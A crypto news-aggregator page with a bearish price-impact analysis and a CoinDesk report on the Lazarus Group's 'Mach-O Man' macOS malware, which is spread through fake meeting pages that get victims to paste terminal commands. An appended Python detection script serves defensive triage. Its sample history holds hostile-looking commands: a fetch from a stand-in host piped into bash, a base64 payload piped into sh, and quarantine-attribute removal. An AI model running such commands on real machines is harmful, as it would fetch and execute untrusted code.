Lazarus Group has become especially dangerous with new Mach-O Man attack: CertiK


Source: CoinDesk

Published:12:20 UTC

BTC Price:$78332.8

#cryptosecurity #lazarusgroup #cyberattack

Analysis

Price Impact

High

The article highlights a sophisticated new macOS malware campaign called "Mach-O Man", attributed to the Lazarus Group and targeting executives in fintech and crypto. The group has a history of significant crypto theft, with billions siphoned. The attack vector bypasses traditional security measures by using social engineering via fake meeting invitations and commands the victim is induced to run in their own terminal. This increases the risk of large-scale hacks and potential loss of funds from exchanges and DeFi protocols, affecting overall market confidence.

Trustworthiness

High

Price Direction

Bearish

Increased security threats and successful exploits can lead to a loss of confidence among investors, potentially causing them to withdraw funds or reduce their exposure to cryptocurrencies. This could put downward pressure on prices across the board, especially for coins associated with high-risk DeFi or exchange platforms.

Time Effect

Short

The immediate concern is the potential for ongoing or new exploits using this method, which could cause short-term price drops. While the threat is persistent, the market's reaction to news of such attacks tends to be most pronounced in the short term.

Original Article:

Article Content:

North Korea's Lazarus Group has a new attack vector that allows it to exploit an apparently routine business call as a gateway into a target's systems.

By Olivier Acuna | Edited by Sheldon Reback
Apr 22, 2026, 12:20 p.m.

Security experts warn crypto and fintech firms to be cautious of new malware that North Korean hackers and other cybercriminals are using. (Shutterstock)

What to know:

- The North Korean Lazarus Group is running a new macOS-focused campaign dubbed “Mach-O Man” that targets executives at fintech, crypto and other high-value firms through routine business communications.
- The operation uses a social engineering technique called ClickFix, luring victims to fake online meetings that instruct them to paste a command to fix an apparent communication problem into their Mac terminal, granting attackers access to corporate and financial systems.
- Researchers say Mach-O Man is a modular malware kit already used beyond Lazarus, and often erases itself before victims realize they have been compromised, making incidents hard to detect or trace.

The North Korean state-run Lazarus Group is running a new campaign known as “Mach-O Man” that turns routine business communication into a direct path to credential theft and data loss, security experts warned Wednesday.

The collective, with cumulative loot estimated at $6.7 billion since 2017, is targeting fintech, cryptocurrency and other high-value executives and firms, Natalie Newson, a senior blockchain security researcher at CertiK, told CoinDesk on Wednesday. In the past two weeks alone, the North Korean hackers have siphoned more than $500 million from the Drift and KelpDAO exploits in what appears to be a sustained campaign.
The crypto industry needs to start viewing Lazarus the same way banks view nation-state cyber actors: “as a constant and well-funded threat, not just another news headline," she said.

"What makes Lazarus especially dangerous right now is their activity level,” Newson said. “KelpDAO, Drift, and now a new macOS malware kit, all within the same month. This isn’t random hacking; it’s a state-directed financial operation running at a scale and speed typical of institutions.”

North Korea has turned crypto theft into a lucrative national industry, and Mach-O Man is just the latest product from that process, she said. While Lazarus created it, other cybercrime groups are also using it.

“It is a modular macOS malware kit created by Lazarus Group’s infamous Chollima division. It uses native Mach-O binaries tailored for Apple environments where crypto and fintech operate,” she said.

Newson said Mach-O Man uses a delivery method known as ClickFix. “It's important to be clear because a lot of coverage is mixing up two separate things,” she noted. ClickFix is a social engineering technique where the victim is asked to paste a command into their terminal to fix a simulated connection issue.

It works by Lazarus sending executives an “urgent” meeting invite over Telegram for a Zoom, Microsoft Teams or Google Meet call, according to Mauro Eldritch, a security expert and founder of threat intelligence firm BCA Ltd. The link leads to a fake, but convincing, website that instructs them to copy and paste one simple command into their Mac’s terminal to "fix a connection issue." In doing so, the victims provide immediate access to corporate systems, SaaS platforms and financial resources. By the time they find out they were exploited, it is usually too late.

There are several variations of this attack, security threat researcher Vladimir S. said on X.
There are already cases where Lazarus attackers have hijacked decentralized finance (DeFi) projects’ domains with this new malware by replacing their websites with a fake message from Cloudflare, asking them to enter a command to grant access.

"These fake 'verification steps' guide victims through keyboard shortcuts that run a harmful command," said CertiK's Newson. "The page looks real, the instructions seem normal, and the victim initiates the action themselves — which is why traditional security controls often miss it.”

Most victims of this hack will not realize their security has been breached until the damage has been done, at which time the malware will have already erased itself as well. “They likely don’t know it yet," she said. "If they do, they probably can’t identify which variant affected them.”
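Because the victim types the command themselves, the artifact a defender is most likely to still have after the malware has removed itself is the shell history entry of that paste. The script below is an added example written for this page, not code from the CoinDesk article, CertiK or BCA: it reads zsh extended-history lines (the default history format on recent macOS) and flags commands whose shape matches what the article describes, a single pasted line that fetches remote content and hands it straight to an interpreter. Which command shapes count as suspicious is this example's own assumption, not detail published in the article, and the sample history entries are constructed.

```python
"""Flag ClickFix-style terminal pastes in macOS zsh history.

Added example for this page; not code from the article, CertiK or BCA.
The indicator patterns are assumptions about what a pasted "fix your
connection" command typically looks like, not details from the article.
"""
import re
from dataclasses import dataclass, field

# zsh extended history prefixes each entry with ": <epoch>:<duration>;"
ZSH_PREFIX_RE = re.compile(r"^: \d+:\d+;")

# Indicator patterns (assumptions, see module docstring).
FETCH_RE = re.compile(r"\b(curl|wget)\b")
PIPE_TO_INTERPRETER_RE = re.compile(
    r"\|\s*(sudo\s+)?(sh|bash|zsh|python3?|perl)\b")
BASE64_DECODE_RE = re.compile(r"\bbase64\s+(-d|-D|--decode)\b")
QUARANTINE_REMOVAL_RE = re.compile(r"\bxattr\b.*\bcom\.apple\.quarantine\b")


@dataclass
class Finding:
    line_no: int
    command: str
    reasons: list = field(default_factory=list)


def strip_history_prefix(raw: str) -> str:
    """Return the bare command from a zsh extended-history entry."""
    return ZSH_PREFIX_RE.sub("", raw).strip()


def assess(command: str) -> list:
    """Return the reasons (possibly none) a command looks like a ClickFix paste."""
    reasons = []
    if FETCH_RE.search(command) and PIPE_TO_INTERPRETER_RE.search(command):
        reasons.append("remote content piped straight into an interpreter")
    if BASE64_DECODE_RE.search(command) and PIPE_TO_INTERPRETER_RE.search(command):
        reasons.append("base64-decoded payload piped into an interpreter")
    if QUARANTINE_REMOVAL_RE.search(command):
        reasons.append("removes the macOS quarantine attribute from a file")
    return reasons


def scan_history(lines) -> list:
    """Scan history entries and return one Finding per suspicious command."""
    findings = []
    for line_no, raw in enumerate(lines, start=1):
        command = strip_history_prefix(raw)
        reasons = assess(command)
        if reasons:
            findings.append(Finding(line_no, command, reasons))
    return findings


# Constructed sample history: three benign entries and three that match the
# shapes above. The hostname uses the reserved .invalid TLD.
SAMPLE_HISTORY = [
    ": 1713780001:0;ls -la ~/Documents",
    ": 1713780002:0;git pull origin main",
    ": 1713780003:0;curl -fsSL https://meeting-fix.example.invalid/connect.sh | bash",
    ": 1713780004:0;brew update",
    ": 1713780005:0;echo aGVsbG8= | base64 -D | sh",
    ": 1713780006:0;xattr -d com.apple.quarantine ~/Downloads/ZoomFix",
]

if __name__ == "__main__":
    # Run against a real machine with:
    #   scan_history(open(os.path.expanduser("~/.zsh_history"), errors="replace"))
    for f in scan_history(SAMPLE_HISTORY):
        print(f"line {f.line_no}: {f.command}")
        for r in f.reasons:
            print(f"    - {r}")
```

Two caveats matter in practice: a user who has set `HIST_IGNORE_SPACE`, or malware that truncates the history file as part of erasing itself, leaves nothing here, so the same patterns are better applied to a process command-line feed from an endpoint agent than to the history file alone; and a match is a lead for triage, not proof of compromise, since legitimate install scripts also use the fetch-and-pipe shape.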